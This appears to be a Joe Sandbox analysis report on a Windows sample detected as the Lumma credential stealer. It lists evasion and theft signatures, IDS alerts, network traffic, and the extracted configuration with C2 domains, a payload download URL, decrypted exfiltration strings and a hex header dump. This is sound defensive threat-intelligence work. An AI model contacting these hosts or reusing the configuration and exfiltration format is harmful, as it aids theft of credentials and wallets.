Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1559587
MD5:ff1c291b46fb3ada2bdb55ba4c14bcfe
SHA1:875c6f3b14c117f3429771d5e8d82ee667c8fed6
SHA256:75c752bb2e5ff68a9689fa43bc6a9e408834ebc40a50725e6ca31fc26553af0e
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7476 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FF1C291B46FB3ADA2BDB55BA4C14BCFE)
    • chrome.exe (PID: 2120 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 6380 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1924,i,16693149984039008949,18427732997764737227,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 4376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7868 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1928,i,15905540884992955177,16070851734019653976,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["p3ar11fter.sbs", "peepburry828.sbs", "processhol.sbs", "3xp3cts1aim.sbs", "p10tgrace.sbs"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1408564784.0000000000F63000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.1435311387.0000000000F66000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1438497350.0000000000F6E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1409004952.0000000000F6B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1361660637.0000000000F62000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 10 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T17:41:22.009186+010020283713Unknown Traffic192.168.2.749704104.21.66.38443TCP
              2024-11-20T17:41:24.119056+010020283713Unknown Traffic192.168.2.749706104.21.66.38443TCP
              2024-11-20T17:41:26.458844+010020283713Unknown Traffic192.168.2.749712104.21.66.38443TCP
              2024-11-20T17:41:28.704099+010020283713Unknown Traffic192.168.2.749718104.21.66.38443TCP
              2024-11-20T17:41:31.461865+010020283713Unknown Traffic192.168.2.749724104.21.66.38443TCP
              2024-11-20T17:41:34.126293+010020283713Unknown Traffic192.168.2.749730104.21.66.38443TCP
              2024-11-20T17:41:36.671229+010020283713Unknown Traffic192.168.2.749737104.21.66.38443TCP
              2024-11-20T17:41:42.030785+010020283713Unknown Traffic192.168.2.749757104.21.66.38443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T17:41:22.702248+010020546531A Network Trojan was detected192.168.2.749704104.21.66.38443TCP
              2024-11-20T17:41:24.840747+010020546531A Network Trojan was detected192.168.2.749706104.21.66.38443TCP
              2024-11-20T17:41:42.640545+010020546531A Network Trojan was detected192.168.2.749757104.21.66.38443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T17:41:22.702248+010020498361A Network Trojan was detected192.168.2.749704104.21.66.38443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T17:41:24.840747+010020498121A Network Trojan was detected192.168.2.749706104.21.66.38443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T17:41:44.283348+010020197142Potentially Bad Traffic192.168.2.749758185.215.113.1680TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T17:41:34.893185+010020480941Malware Command and Control Activity Detected192.168.2.749730104.21.66.38443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: https://cook-rain.sbs/HfAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/zfAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/WfAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/api_Avira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/AfAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/apibeAvira URL Cloud: Label: malware
              Source: http://185.215.113.16/steam/random.exeIAvira URL Cloud: Label: phishing
              Source: file.exe.7476.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["p3ar11fter.sbs", "peepburry828.sbs", "processhol.sbs", "3xp3cts1aim.sbs", "p10tgrace.sbs"], "Build id": "LOGS11--LiveTraffic"}
              Source: file.exeReversingLabs: Detection: 39%
              Source: file.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.1677147842.0000000000141000.00000040.00000001.01000000.00000003.sdmpString decryptor: p3ar11fter.sbs
              Source: 00000000.00000002.1677147842.0000000000141000.00000040.00000001.01000000.00000003.sdmpString decryptor: 3xp3cts1aim.sbs
              Source: 00000000.00000002.1677147842.0000000000141000.00000040.00000001.01000000.00000003.sdmpString decryptor: peepburry828.sbs
              Source: 00000000.00000002.1677147842.0000000000141000.00000040.00000001.01000000.00000003.sdmpString decryptor: p10tgrace.sbs
              Source: 00000000.00000002.1677147842.0000000000141000.00000040.00000001.01000000.00000003.sdmpString decryptor: processhol.sbs
              Source: 00000000.00000002.1677147842.0000000000141000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1677147842.0000000000141000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1677147842.0000000000141000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1677147842.0000000000141000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1677147842.0000000000141000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.7:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.7:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.7:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.7:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.7:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.7:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.7:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.7:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.7:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.7:49812 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.7:49814 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.7:49932 version: TLS 1.2
              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.1607549423.0000000008020000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1682977951.0000000005F02000.00000040.00000800.00020000.00000000.sdmp

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49704 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49704 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49706 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49706 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49730 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49757 -> 104.21.66.38:443
              Source: Malware configuration extractorURLs: p3ar11fter.sbs
              Source: Malware configuration extractorURLs: peepburry828.sbs
              Source: Malware configuration extractorURLs: processhol.sbs
              Source: Malware configuration extractorURLs: 3xp3cts1aim.sbs
              Source: Malware configuration extractorURLs: p10tgrace.sbs
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 16:41:44 GMTContent-Type: application/octet-streamContent-Length: 2840064Last-Modified: Wed, 20 Nov 2024 16:31:06 GMTConnection: keep-aliveETag: "673e0eca-2b5600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 07 45 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 64 69 63 70 62 67 63 65 00 00 2b 00 00 a0 00 00 00 f6 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 78 61 73 76 73 77 7a 00 20 00 00 00 a0 2b 00 00 04 00 00 00 30 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 2b 00 00 22 00 00 00 34 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
              Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
              Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49712 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49724 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49730 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49737 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49757 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49718 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49706 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49704 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49758 -> 185.215.113.16:80
              Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
              Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
              Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
              Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
              Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
              Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
              Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
              Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
              Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
              Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
              Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
              Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
              Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
              Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120100v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
